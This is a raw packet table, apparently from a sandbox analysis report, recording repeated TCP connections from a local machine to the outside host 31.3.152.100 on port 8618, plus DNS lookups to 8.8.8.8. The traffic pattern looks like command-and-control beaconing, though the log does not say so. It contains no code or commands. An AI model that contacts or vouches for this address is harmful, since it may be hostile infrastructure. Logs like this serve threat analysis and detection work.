Sep 21, 2021 21:35:21.950064898 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950076103 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950079918 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950082064 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950092077 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950098991 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950115919 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950129032 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950140953 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950145960 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950156927 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950162888 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950180054 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950181007 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950200081 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950215101 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950217009 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950236082 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950253010 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950257063 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950269938 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950297117 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950534105 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950603008 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950649023 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.058377981 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074740887 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074768066 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074779987 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074795008 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074810982 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074825048 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.074827909 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074845076 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074862003 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.074870110 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.074925900 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.076050043 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076073885 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076091051 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076107025 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076122999 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076176882 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.076203108 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.076309919 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076328039 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076354027 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076371908 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076387882 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.076423883 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.076447964 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.094961882 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.234309912 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234342098 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234361887 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234380007 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234397888 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234419107 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234436989 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234452009 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234457970 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.234535933 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.234875917 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234894037 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234901905 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234951019 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.234970093 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.234996080 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235017061 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235037088 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.235063076 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235084057 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235102892 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.235188961 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.235564947 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235838890 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235857010 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235872984 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235889912 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235905886 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.235922098 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236334085 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236347914 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236438990 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236458063 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236474037 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236493111 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236510992 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236526012 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236542940 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236558914 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236572027 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236577034 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236586094 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236594915 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236612082 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236613035 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236632109 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236649990 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236651897 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236668110 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236684084 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236700058 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236701965 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236757040 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.236798048 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236816883 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.236876965 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.237037897 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237087965 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237097979 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.237247944 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237283945 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237334967 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.237361908 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237420082 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.237426996 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237678051 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237694979 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.237759113 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.279076099 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.374836922 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.374871969 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.374941111 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.374950886 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.374969959 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.374988079 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375005960 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375022888 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375025988 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.375072002 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.375260115 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375304937 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.375372887 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375391006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375408888 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375426054 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.375449896 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.375482082 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.375793934 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.376775026 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.376802921 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.376856089 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.376858950 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.376941919 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.376955986 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.376991987 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377038002 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377060890 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377338886 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377357006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377404928 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377492905 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377511978 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377527952 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377531052 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377547026 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377563000 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377571106 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377595901 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377811909 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377832890 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377878904 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.377932072 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.377949953 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378258944 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378303051 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378309011 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.378340960 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.378384113 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378402948 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378567934 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.378951073 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378969908 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.378988028 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379004002 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379018068 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379049063 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379059076 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379080057 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379096985 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379152060 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379230976 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379251003 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379285097 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379311085 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379328966 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379348040 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379355907 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379367113 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379383087 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379388094 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379415035 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379426003 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379631042 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379648924 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.379679918 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.379949093 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.380006075 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.380007982 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:22.380021095 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:22.380064011 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:28.854494095 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:28.858402967 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:29.041898966 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:29.474172115 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:29.637444019 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:29.637733936 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:29.995284081 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:30.133599997 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:38.859617949 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:38.894738913 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:39.081907988 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:40.529537916 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:40.572185993 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:47.676599979 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:06.916109085 CEST	49803	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:07.054913998 CEST	8618	49803	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:07.055092096 CEST	49803	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:07.068762064 CEST	49803	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:07.215317965 CEST	8618	49803	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:08.355268955 CEST	49804	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:08.493303061 CEST	8618	49804	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:08.493444920 CEST	49804	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:08.503154993 CEST	49804	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:08.693141937 CEST	8618	49804	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:09.838078976 CEST	49805	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:09.979986906 CEST	8618	49805	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:09.980170012 CEST	49805	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:09.988924980 CEST	49805	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:10.161402941 CEST	8618	49805	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:11.304943085 CEST	49806	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:11.442802906 CEST	8618	49806	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:11.442923069 CEST	49806	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:11.451385975 CEST	49806	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:11.591984034 CEST	8618	49806	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:12.735191107 CEST	49807	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:12.872989893 CEST	8618	49807	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:12.873152971 CEST	49807	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:12.884149075 CEST	49807	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:13.029115915 CEST	8618	49807	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:14.167412996 CEST	49808	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:14.305628061 CEST	8618	49808	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:14.305838108 CEST	49808	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:14.314908981 CEST	49808	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:14.490032911 CEST	8618	49808	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:15.668632030 CEST	49809	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:15.806570053 CEST	8618	49809	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:15.807503939 CEST	49809	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:15.968074083 CEST	8618	49809	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:15.968329906 CEST	49809	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:16.330650091 CEST	49809	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:16.470055103 CEST	8618	49809	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:18.864964008 CEST	49810	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:19.003844023 CEST	8618	49810	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:19.003984928 CEST	49810	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:19.010473013 CEST	49810	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:19.157578945 CEST	8618	49810	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:20.306142092 CEST	49811	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:20.444597960 CEST	8618	49811	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:20.444854975 CEST	49811	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:20.456471920 CEST	49811	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:20.609564066 CEST	8618	49811	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:21.763868093 CEST	49812	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:21.902223110 CEST	8618	49812	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:21.902362108 CEST	49812	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:21.914809942 CEST	49812	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:36:22.071432114 CEST	8618	49812	31.3.152.100	192.168.2.3
Sep 21, 2021 21:36:23.234061003 CEST	49813	8618	192.168.2.3	31.3.152.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2021 21:33:47.545902967 CEST	49199	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:33:47.567079067 CEST	53	49199	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:00.621356964 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:00.641349077 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:01.173760891 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:01.193263054 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:02.211042881 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:02.230432987 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:03.218641043 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:03.238538027 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:05.249924898 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:05.269920111 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:09.297568083 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:09.317492008 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:17.447237015 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:17.494966030 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:19.758346081 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:19.799098015 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:39.394190073 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:39.416810036 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:42.564908981 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:42.587831974 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:43.700989962 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:43.773694992 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:49.107928991 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:49.143754005 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:55.863495111 CEST	63492	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:55.880031109 CEST	60831	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:34:55.891479015 CEST	53	63492	8.8.8.8	192.168.2.3
Sep 21, 2021 21:34:55.911165953 CEST	53	60831	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:06.059420109 CEST	60100	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:06.081227064 CEST	53	60100	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:17.534106970 CEST	53195	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:17.672116041 CEST	53	53195	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:23.427764893 CEST	50141	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:23.448710918 CEST	53	50141	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:24.761620045 CEST	53023	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:24.802829027 CEST	53	53023	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:33.050353050 CEST	49563	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:33.075711012 CEST	53	49563	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:33.807349920 CEST	51352	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:33.855062008 CEST	53	51352	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:43.521642923 CEST	59349	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:43.554512978 CEST	53	59349	8.8.8.8	192.168.2.3
Sep 21, 2021 21:35:47.473746061 CEST	57084	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:35:47.493880033 CEST	53	57084	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:06.776906967 CEST	58823	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:06.908086061 CEST	53	58823	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:08.222467899 CEST	57568	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:08.354443073 CEST	53	57568	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:09.705677986 CEST	50540	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:09.837095976 CEST	53	50540	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:11.173659086 CEST	54366	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:11.304291964 CEST	53	54366	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:12.600111961 CEST	53034	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:12.731333017 CEST	53	53034	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:14.033785105 CEST	57762	53	192.168.2.3	8.8.8.8
